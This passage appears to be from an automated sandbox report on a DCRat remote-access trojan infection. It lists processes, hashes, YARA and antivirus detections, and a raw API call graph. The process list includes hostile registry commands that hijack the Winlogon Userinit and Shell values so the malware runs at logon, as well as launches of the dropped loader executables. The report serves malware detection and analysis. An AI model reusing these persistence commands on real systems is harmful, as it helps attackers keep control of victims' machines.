                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff693ab0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:00:54:03
                        Start date:23/06/2024
                        Path:C:\Windows\System32\choice.exe
                        Wow64 process (32bit):false
                        Commandline:choice /c y /n /t 10 /d y
                        Imagebase:0x7ff6c4840000
                        File size:35'840 bytes
                        MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Windows\System32\reg.exe
                        Wow64 process (32bit):false
                        Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f
                        Imagebase:0x7ff6aa990000
                        File size:77'312 bytes
                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:10
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Windows\System32\reg.exe
                        Wow64 process (32bit):false
                        Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f
                        Imagebase:0x7ff6aa990000
                        File size:77'312 bytes
                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:11
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
                        Imagebase:0x7ff64d320000
                        File size:1'257'951 bytes
                        MD5 hash:43AF303E1F32CE8C477ABBFB07887EA2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 71%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
                        Imagebase:0x9b0000
                        File size:608'296 bytes
                        MD5 hash:B6C3C00D7CF6D8D13F20DBC590A675AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 39%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:13
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Imagebase:0xf50000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"
                        Imagebase:0x7ff626120000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:15
                        Start time:00:54:13
                        Start date:23/06/2024
                        Path:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\ProgramData\SoftwareDistribution\Bypass.exe"
                        Imagebase:0x7f0000
                        File size:1'848'832 bytes
                        MD5 hash:93E99FB34AC2CD9D6E867E24DCAFB2AB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security
                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security
                        • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: ditekSHen
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 79%, ReversingLabs
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:11.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:27.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:23
                          execution_graph 26010 7ff71614d94c 26011 7ff71614d997 26010->26011 26016 7ff71614d95b abort 26010->26016 26020 7ff71614d69c 15 API calls abort 26011->26020 26013 7ff71614d97e RtlAllocateHeap 26014 7ff71614d995 26013->26014 26013->26016 26016->26011 26016->26013 26017 7ff71614bbc0 26016->26017 26021 7ff71614bc00 26017->26021 26020->26014 26026 7ff71614f398 EnterCriticalSection 26021->26026 26029 7ff71614154b 26031 7ff7161414a2 26029->26031 26032 7ff716141900 26031->26032 26058 7ff716141558 26032->26058 26035 7ff71614198b 26036 7ff716141868 DloadReleaseSectionWriteAccess 6 API calls 26035->26036 26037 7ff716141998 RaiseException 26036->26037 26038 7ff716141bb5 26037->26038 26038->26031 26039 7ff716141a3d LoadLibraryExA 26041 7ff716141aa9 26039->26041 26042 7ff716141a54 GetLastError 26039->26042 26040 7ff716141b85 26066 7ff716141868 26040->26066 26044 7ff716141abd 26041->26044 26048 7ff716141ab4 FreeLibrary 26041->26048 26046 7ff716141a69 26042->26046 26047 7ff716141a7e 26042->26047 26043 7ff7161419b4 26043->26039 26043->26040 26043->26041 26043->26044 26044->26040 26045 7ff716141b1b GetProcAddress 26044->26045 26045->26040 26051 7ff716141b30 GetLastError 26045->26051 26046->26041 26046->26047 26050 7ff716141868 DloadReleaseSectionWriteAccess 6 API calls 26047->26050 26048->26044 26052 7ff716141a8b RaiseException 26050->26052 26053 7ff716141b45 26051->26053 26052->26038 26053->26040 26054 7ff716141868 DloadReleaseSectionWriteAccess 6 API calls 26053->26054 26055 7ff716141b67 RaiseException 26054->26055 26056 7ff716141558 _com_raise_error 6 API calls 26055->26056 26057 7ff716141b81 26056->26057 26057->26040 26059 7ff71614156e 26058->26059 26065 7ff7161415d3 26058->26065 26074 7ff716141604 26059->26074 26062 7ff7161415ce 26064 7ff716141604 DloadReleaseSectionWriteAccess 3 API calls 26062->26064 26064->26065 26065->26035 26065->26043 26067 7ff716141878 26066->26067 26068 7ff7161418d1 26066->26068 26069 7ff716141604 DloadReleaseSectionWriteAccess 3 API calls 26067->26069 26068->26038 26070 7ff71614187d 26069->26070 26071 7ff7161418cc 26070->26071 26072 7ff7161417d8 DloadProtectSection 3 API calls 26070->26072 26073 7ff716141604 DloadReleaseSectionWriteAccess 3 API calls 26071->26073 26072->26071 26073->26068 26075 7ff71614161f 26074->26075 26076 7ff716141573 26074->26076 26075->26076 26077 7ff716141624 GetModuleHandleW 26075->26077 26076->26062 26081 7ff7161417d8 26076->26081 26078 7ff716141639 26077->26078 26079 7ff71614163e GetProcAddress 26077->26079 26078->26076 26079->26078 26080 7ff716141653 GetProcAddress 26079->26080 26080->26078 26082 7ff7161417fa DloadProtectSection 26081->26082 26083 7ff71614183a VirtualProtect 26082->26083 26084 7ff716141802 26082->26084 26086 7ff7161416a4 VirtualQuery GetSystemInfo 26082->26086 26083->26084 26084->26062 26086->26083 28551 7ff71614bf2c 28558 7ff71614bc34 28551->28558 28563 7ff71614d440 35 API calls 2 library calls 28558->28563 28560 7ff71614bc3f 28564 7ff71614d068 35 API calls abort 28560->28564 28563->28560 26092 7ff71613b190 26435 7ff71611255c 26092->26435 26094 7ff71613b1db 26095 7ff71613b1ef 26094->26095 26096 7ff71613be93 26094->26096 26246 7ff71613b20c 26094->26246 26100 7ff71613b2db 26095->26100 26101 7ff71613b1ff 26095->26101 26095->26246 26720 7ff71613f390 26096->26720 26107 7ff71613b391 26100->26107 26112 7ff71613b2f5 26100->26112 26105 7ff71613b2a9 26101->26105 26106 7ff71613b207 26101->26106 26102 7ff71613beba IsDlgButtonChecked 26103 7ff71613bec9 26102->26103 26109 7ff71613bef0 GetDlgItem IsDlgButtonChecked 26103->26109 26110 7ff71613bed5 SendDlgItemMessageW 26103->26110 26111 7ff71613b2cb EndDialog 26105->26111 26105->26246 26115 7ff71612aae0 48 API calls 26106->26115 26106->26246 26443 7ff7161122bc GetDlgItem 26107->26443 26739 7ff7161262dc GetCurrentDirectoryW 26109->26739 26110->26109 26111->26246 26116 7ff71612aae0 48 API calls 26112->26116 26118 7ff71613b236 26115->26118 26119 7ff71613b313 SetDlgItemTextW 26116->26119 26117 7ff71613bf47 GetDlgItem 26749 7ff716112520 26117->26749 26753 7ff716111ec4 34 API calls _handle_error 26118->26753 26125 7ff71613b326 26119->26125 26120 7ff71613b3b1 EndDialog 26131 7ff71613b3da 26120->26131 26123 7ff71613b408 GetDlgItem 26129 7ff71613b422 IsDlgButtonChecked IsDlgButtonChecked 26123->26129 26130 7ff71613b44f SetFocus 26123->26130 26124 7ff71613b3f5 26124->26120 26138 7ff71613bcc5 26124->26138 26134 7ff71613b340 GetMessageW 26125->26134 26125->26246 26128 7ff71613b246 26133 7ff71613b25c 26128->26133 26754 7ff71611250c 26128->26754 26129->26130 26135 7ff71613b4f2 26130->26135 26136 7ff71613b465 26130->26136 26139 7ff716111fa0 31 API calls 26131->26139 26150 7ff71613c363 26133->26150 26133->26246 26143 7ff71613b35e IsDialogMessageW 26134->26143 26134->26246 26457 7ff716118d04 26135->26457 26137 7ff71612aae0 48 API calls 26136->26137 26145 7ff71613b46f 26137->26145 26146 7ff71612aae0 48 API calls 26138->26146 26139->26246 26143->26125 26144 7ff71613b373 TranslateMessage DispatchMessageW 26143->26144 26144->26125 26757 7ff71611129c 26145->26757 26151 7ff71613bcd6 SetDlgItemTextW 26146->26151 26148 7ff71613b52c 26467 7ff71613ef80 26148->26467 26814 7ff716147904 26150->26814 26154 7ff71612aae0 48 API calls 26151->26154 26160 7ff71613bd08 26154->26160 26176 7ff71611129c 33 API calls 26160->26176 26161 7ff71613c368 26170 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26161->26170 26165 7ff71613b498 26168 7ff71613f0a4 24 API calls 26165->26168 26174 7ff71613b4a5 26168->26174 26177 7ff71613c36e 26170->26177 26174->26161 26196 7ff71613b4e8 26174->26196 26204 7ff71613bd31 26176->26204 26188 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26177->26188 26187 7ff71613bdda 26197 7ff71612aae0 48 API calls 26187->26197 26198 7ff71613c374 26188->26198 26192 7ff716111fa0 31 API calls 26202 7ff71613b586 26192->26202 26195 7ff71613b5ec 26207 7ff71613b61a 26195->26207 26768 7ff7161232a8 26195->26768 26196->26195 26767 7ff71613fa80 33 API calls 2 library calls 26196->26767 26209 7ff71613bde4 26197->26209 26213 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26198->26213 26202->26177 26202->26196 26204->26187 26215 7ff71611129c 33 API calls 26204->26215 26505 7ff716122f58 26207->26505 26220 7ff71611129c 33 API calls 26209->26220 26214 7ff71613c37a 26213->26214 26227 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26214->26227 26221 7ff71613bd7f 26215->26221 26226 7ff71613be0d 26220->26226 26229 7ff71612aae0 48 API calls 26221->26229 26224 7ff71613b64c 26517 7ff716127fc4 26224->26517 26225 7ff71613b634 GetLastError 26225->26224 26243 7ff71611129c 33 API calls 26226->26243 26232 7ff71613c380 26227->26232 26233 7ff71613bd8a 26229->26233 26231 7ff71613b60e 26771 7ff716139d90 12 API calls _handle_error 26231->26771 26244 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26232->26244 26238 7ff716111150 33 API calls 26233->26238 26245 7ff71613bda2 26238->26245 26240 7ff71613b65e 26241 7ff71613b665 GetLastError 26240->26241 26242 7ff71613b674 26240->26242 26241->26242 26248 7ff71613b71c 26242->26248 26252 7ff71613b68b GetTickCount 26242->26252 26253 7ff71613b72b 26242->26253 26249 7ff71613be4e 26243->26249 26250 7ff71613c386 26244->26250 26801 7ff716112034 26245->26801 26805 7ff716142320 26246->26805 26248->26253 26268 7ff71613bb79 26248->26268 26261 7ff716111fa0 31 API calls 26249->26261 26254 7ff71611255c 61 API calls 26250->26254 26520 7ff716114228 26252->26520 26258 7ff71613ba50 26253->26258 26772 7ff716126454 26253->26772 26257 7ff71613c3e4 26254->26257 26262 7ff71613c3e8 26257->26262 26271 7ff71613c489 GetDlgItem SetFocus 26257->26271 26318 7ff71613c3fd 26257->26318 26258->26120 26796 7ff71611bd0c 33 API calls 26258->26796 26259 7ff71613bdbe 26266 7ff716111fa0 31 API calls 26259->26266 26269 7ff71613be78 26261->26269 26277 7ff716142320 _handle_error 8 API calls 26262->26277 26273 7ff71613bdcc 26266->26273 26283 7ff71612aae0 48 API calls 26268->26283 26275 7ff716111fa0 31 API calls 26269->26275 26270 7ff71613ba75 26797 7ff716111150 26270->26797 26281 7ff71613c4ba 26271->26281 26272 7ff71613b74e 26784 7ff71612b914 102 API calls 26272->26784 26280 7ff716111fa0 31 API calls 26273->26280 26274 7ff71613b6ba 26530 7ff716111fa0 26274->26530 26284 7ff71613be83 26275->26284 26286 7ff71613ca97 26277->26286 26280->26187 26295 7ff71611129c 33 API calls 26281->26295 26290 7ff71613bba7 SetDlgItemTextW 26283->26290 26291 7ff716111fa0 31 API calls 26284->26291 26285 7ff71613ba8a 26292 7ff71612aae0 48 API calls 26285->26292 26288 7ff71613b768 26294 7ff71612da98 48 API calls 26288->26294 26289 7ff71613b6c8 26535 7ff716122134 26289->26535 26297 7ff716112534 26290->26297 26291->26131 26298 7ff71613ba97 26292->26298 26293 7ff71613c434 SendDlgItemMessageW 26299 7ff71613c45d EndDialog 26293->26299 26300 7ff71613c454 26293->26300 26301 7ff71613b7aa GetCommandLineW 26294->26301 26296 7ff71613c4cc 26295->26296 26819 7ff7161280d8 33 API calls 26296->26819 26303 7ff71613bbc5 SetDlgItemTextW GetDlgItem 26297->26303 26304 7ff716111150 33 API calls 26298->26304 26299->26262 26300->26299 26305 7ff71613b869 26301->26305 26306 7ff71613b84f 26301->26306 26310 7ff71613bbf0 GetWindowLongPtrW SetWindowLongPtrW 26303->26310 26311 7ff71613bc13 26303->26311 26312 7ff71613baaa 26304->26312 26789 7ff71613ab54 33 API calls _handle_error 26305->26789 26785 7ff7161120b0 26306->26785 26307 7ff71613c4e0 26313 7ff71611250c SetDlgItemTextW 26307->26313 26310->26311 26555 7ff71613ce88 26311->26555 26317 7ff716111fa0 31 API calls 26312->26317 26320 7ff71613c4f4 26313->26320 26314 7ff71613b87a 26790 7ff71613ab54 33 API calls _handle_error 26314->26790 26325 7ff71613bab5 26317->26325 26318->26262 26318->26293 26330 7ff71613c526 SendDlgItemMessageW FindFirstFileW 26320->26330 26322 7ff71613b6f5 GetLastError 26323 7ff71613b704 26322->26323 26551 7ff71612204c 26323->26551 26329 7ff716111fa0 31 API calls 26325->26329 26326 7ff71613b88b 26791 7ff71613ab54 33 API calls _handle_error 26326->26791 26328 7ff71613ce88 160 API calls 26333 7ff71613bc3c 26328->26333 26334 7ff71613bac3 26329->26334 26335 7ff71613c57b 26330->26335 26428 7ff71613ca04 26330->26428 26705 7ff71613f974 26333->26705 26344 7ff71612aae0 48 API calls 26334->26344 26345 7ff71612aae0 48 API calls 26335->26345 26336 7ff71613b89c 26792 7ff71612b9b4 102 API calls 26336->26792 26341 7ff71613b8b3 26793 7ff71613fbdc 33 API calls 26341->26793 26342 7ff71613ca81 26342->26262 26343 7ff71613ce88 160 API calls 26358 7ff71613bc6a 26343->26358 26348 7ff71613badb 26344->26348 26349 7ff71613c59e 26345->26349 26347 7ff71613caa9 26351 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26347->26351 26359 7ff71611129c 33 API calls 26348->26359 26360 7ff71611129c 33 API calls 26349->26360 26350 7ff71613b8d2 CreateFileMappingW 26353 7ff71613b911 MapViewOfFile 26350->26353 26354 7ff71613b953 ShellExecuteExW 26350->26354 26355 7ff71613caae 26351->26355 26352 7ff71613bc96 26719 7ff716112298 GetDlgItem EnableWindow 26352->26719 26794 7ff716143640 26353->26794 26375 7ff71613b974 26354->26375 26361 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26355->26361 26358->26352 26362 7ff71613ce88 160 API calls 26358->26362 26369 7ff71613bb04 26359->26369 26363 7ff71613c5cd 26360->26363 26364 7ff71613cab4 26361->26364 26362->26352 26365 7ff716111150 33 API calls 26363->26365 26368 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26364->26368 26366 7ff71613c5e8 26365->26366 26820 7ff71611e164 33 API calls 2 library calls 26366->26820 26367 7ff71613b9c3 26376 7ff71613b9dc UnmapViewOfFile CloseHandle 26367->26376 26377 7ff71613b9ef 26367->26377 26373 7ff71613caba 26368->26373 26369->26214 26370 7ff71613bb5a 26369->26370 26371 7ff716111fa0 31 API calls 26370->26371 26371->26120 26380 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26373->26380 26374 7ff71613c5ff 26378 7ff716111fa0 31 API calls 26374->26378 26375->26367 26383 7ff71613b9b1 Sleep 26375->26383 26376->26377 26377->26198 26379 7ff71613ba25 26377->26379 26382 7ff71613c60c 26378->26382 26381 7ff716111fa0 31 API calls 26379->26381 26384 7ff71613cac0 26380->26384 26385 7ff71613ba42 26381->26385 26382->26355 26388 7ff716111fa0 31 API calls 26382->26388 26383->26367 26383->26375 26386 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26384->26386 26387 7ff716111fa0 31 API calls 26385->26387 26389 7ff71613cac6 26386->26389 26387->26258 26390 7ff71613c673 26388->26390 26392 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26389->26392 26391 7ff71611250c SetDlgItemTextW 26390->26391 26393 7ff71613c687 FindClose 26391->26393 26394 7ff71613cacc 26392->26394 26395 7ff71613c797 SendDlgItemMessageW 26393->26395 26396 7ff71613c6a3 26393->26396 26398 7ff71613c7cb 26395->26398 26821 7ff71613a2cc 10 API calls _handle_error 26396->26821 26401 7ff71612aae0 48 API calls 26398->26401 26399 7ff71613c6c6 26400 7ff71612aae0 48 API calls 26399->26400 26402 7ff71613c6cf 26400->26402 26403 7ff71613c7d8 26401->26403 26404 7ff71612da98 48 API calls 26402->26404 26405 7ff71611129c 33 API calls 26403->26405 26408 7ff71613c6ec BuildCatchObjectHelperInternal 26404->26408 26407 7ff71613c807 26405->26407 26406 7ff716111fa0 31 API calls 26409 7ff71613c783 26406->26409 26410 7ff716111150 33 API calls 26407->26410 26408->26364 26408->26406 26411 7ff71611250c SetDlgItemTextW 26409->26411 26412 7ff71613c822 26410->26412 26411->26395 26822 7ff71611e164 33 API calls 2 library calls 26412->26822 26414 7ff71613c839 26415 7ff716111fa0 31 API calls 26414->26415 26416 7ff71613c845 BuildCatchObjectHelperInternal 26415->26416 26417 7ff716111fa0 31 API calls 26416->26417 26418 7ff71613c87f 26417->26418 26419 7ff716111fa0 31 API calls 26418->26419 26420 7ff71613c88c 26419->26420 26420->26373 26421 7ff716111fa0 31 API calls 26420->26421 26422 7ff71613c8f3 26421->26422 26423 7ff71611250c SetDlgItemTextW 26422->26423 26424 7ff71613c907 26423->26424 26424->26428 26823 7ff71613a2cc 10 API calls _handle_error 26424->26823 26426 7ff71613c932 26427 7ff71612aae0 48 API calls 26426->26427 26429 7ff71613c93c 26427->26429 26428->26262 26428->26342 26428->26347 26428->26389 26430 7ff71612da98 48 API calls 26429->26430 26434 7ff71613c959 BuildCatchObjectHelperInternal 26430->26434 26431 7ff716111fa0 31 API calls 26432 7ff71613c9f0 26431->26432 26433 7ff71611250c SetDlgItemTextW 26432->26433 26433->26428 26434->26384 26434->26431 26436 7ff71611256a 26435->26436 26437 7ff7161125d0 26435->26437 26436->26437 26824 7ff71612a4ac 26436->26824 26437->26094 26439 7ff71611258f 26439->26437 26440 7ff7161125a4 GetDlgItem 26439->26440 26440->26437 26441 7ff7161125b7 26440->26441 26441->26437 26442 7ff7161125be SetDlgItemTextW 26441->26442 26442->26437 26444 7ff716112334 26443->26444 26445 7ff7161122fc 26443->26445 26923 7ff7161123f8 GetWindowTextLengthW 26444->26923 26447 7ff71611129c 33 API calls 26445->26447 26448 7ff71611232a BuildCatchObjectHelperInternal 26447->26448 26449 7ff716111fa0 31 API calls 26448->26449 26452 7ff716112389 26448->26452 26449->26452 26450 7ff7161123c8 26451 7ff716142320 _handle_error 8 API calls 26450->26451 26453 7ff7161123dd 26451->26453 26452->26450 26454 7ff7161123f0 26452->26454 26453->26120 26453->26123 26453->26124 26455 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26455 26456 7ff7161123f5 26455->26456 26458 7ff716118d34 26457->26458 26465 7ff716118de8 26457->26465 26460 7ff716118d42 BuildCatchObjectHelperInternal 26458->26460 26462 7ff716118d91 26458->26462 26463 7ff716118de3 26458->26463 26460->26148 26462->26460 26466 7ff7161421d0 33 API calls 26462->26466 26958 7ff716111f80 33 API calls 3 library calls 26463->26958 26959 7ff716112004 33 API calls std::_Xinvalid_argument 26465->26959 26466->26460 26471 7ff71613efb0 26467->26471 26468 7ff71613efd7 26469 7ff716142320 _handle_error 8 API calls 26468->26469 26470 7ff71613b537 26469->26470 26481 7ff71612aae0 26470->26481 26471->26468 26960 7ff71611bd0c 33 API calls 26471->26960 26473 7ff71613f02a 26474 7ff716111150 33 API calls 26473->26474 26475 7ff71613f03f 26474->26475 26476 7ff716111fa0 31 API calls 26475->26476 26479 7ff71613f04f BuildCatchObjectHelperInternal 26475->26479 26476->26479 26477 7ff716111fa0 31 API calls 26478 7ff71613f076 26477->26478 26480 7ff716111fa0 31 API calls 26478->26480 26479->26477 26480->26468 26482 7ff71612aaf3 26481->26482 26961 7ff716129774 26482->26961 26485 7ff71612ab58 LoadStringW 26486 7ff71612ab86 26485->26486 26487 7ff71612ab71 LoadStringW 26485->26487 26488 7ff71612da98 26486->26488 26487->26486 26980 7ff71612d874 26488->26980 26491 7ff71613f0a4 27014 7ff71613ae1c PeekMessageW 26491->27014 26494 7ff71613f0f5 26498 7ff71613f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26494->26498 26495 7ff71613f143 IsDlgButtonChecked IsDlgButtonChecked 26496 7ff71613f189 26495->26496 26497 7ff71613f1a4 IsDlgButtonChecked 26495->26497 26496->26497 26499 7ff71613f1c6 IsDlgButtonChecked IsDlgButtonChecked 26497->26499 26500 7ff71613f1c3 26497->26500 26498->26495 26501 7ff71613f218 IsDlgButtonChecked 26499->26501 26502 7ff71613f1f3 IsDlgButtonChecked 26499->26502 26500->26499 26503 7ff716142320 _handle_error 8 API calls 26501->26503 26502->26501 26504 7ff71613b578 26503->26504 26504->26192 26506 7ff71612309d 26505->26506 26512 7ff716122f8e 26505->26512 26507 7ff716142320 _handle_error 8 API calls 26506->26507 26508 7ff7161230b3 26507->26508 26508->26224 26508->26225 26509 7ff716123077 26509->26506 26510 7ff716123684 56 API calls 26509->26510 26510->26506 26511 7ff71611129c 33 API calls 26511->26512 26512->26509 26512->26511 26514 7ff7161230c8 26512->26514 27019 7ff716123684 26512->27019 26515 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26514->26515 26516 7ff7161230cd 26515->26516 26518 7ff716127fcf 26517->26518 26519 7ff716127fd2 SetCurrentDirectoryW 26517->26519 26518->26519 26519->26240 26521 7ff716114255 26520->26521 26522 7ff71611426a 26521->26522 26523 7ff71611129c 33 API calls 26521->26523 26524 7ff716142320 _handle_error 8 API calls 26522->26524 26523->26522 26525 7ff7161142a1 26524->26525 26526 7ff716113c84 26525->26526 26527 7ff716113cab 26526->26527 27152 7ff71611710c 26527->27152 26529 7ff716113cbb BuildCatchObjectHelperInternal 26529->26274 26531 7ff716111fb3 26530->26531 26532 7ff716111fdc 26530->26532 26531->26532 26533 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26531->26533 26532->26289 26534 7ff716112000 26533->26534 26536 7ff71612216a 26535->26536 26537 7ff71612219e 26536->26537 26538 7ff7161221b1 CreateFileW 26536->26538 26539 7ff71612227f 26537->26539 26540 7ff716126a0c 49 API calls 26537->26540 26538->26537 26541 7ff7161222af 26539->26541 26544 7ff7161120b0 33 API calls 26539->26544 26543 7ff716122209 26540->26543 26542 7ff716142320 _handle_error 8 API calls 26541->26542 26545 7ff7161222c4 26542->26545 26546 7ff71612220d CreateFileW 26543->26546 26547 7ff716122246 26543->26547 26544->26541 26545->26322 26545->26323 26546->26547 26547->26539 26548 7ff7161222d8 26547->26548 26549 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26548->26549 26550 7ff7161222dd 26549->26550 26552 7ff716122066 26551->26552 26553 7ff716122072 26551->26553 26552->26553 27164 7ff7161220d0 26552->27164 27171 7ff71613aa08 26555->27171 26557 7ff71613d1ee 26558 7ff716111fa0 31 API calls 26557->26558 26559 7ff71613d1f7 26558->26559 26561 7ff716142320 _handle_error 8 API calls 26559->26561 26560 7ff71612d22c 33 API calls 26695 7ff71613cf03 BuildCatchObjectHelperInternal 26560->26695 26562 7ff71613bc2b 26561->26562 26562->26328 26563 7ff71613eefa 27304 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 26563->27304 26566 7ff71613ef00 27305 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 26566->27305 26568 7ff71613ef06 26572 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26568->26572 26570 7ff71613eeee 26571 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26570->26571 26573 7ff71613eef4 26571->26573 26574 7ff71613ef0c 26572->26574 27303 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 26573->27303 26577 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26574->26577 26579 7ff71613ef12 26577->26579 26578 7ff71613ee4a 26580 7ff71613eed2 26578->26580 26581 7ff7161120b0 33 API calls 26578->26581 26584 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26579->26584 27301 7ff716111f80 33 API calls 3 library calls 26580->27301 26585 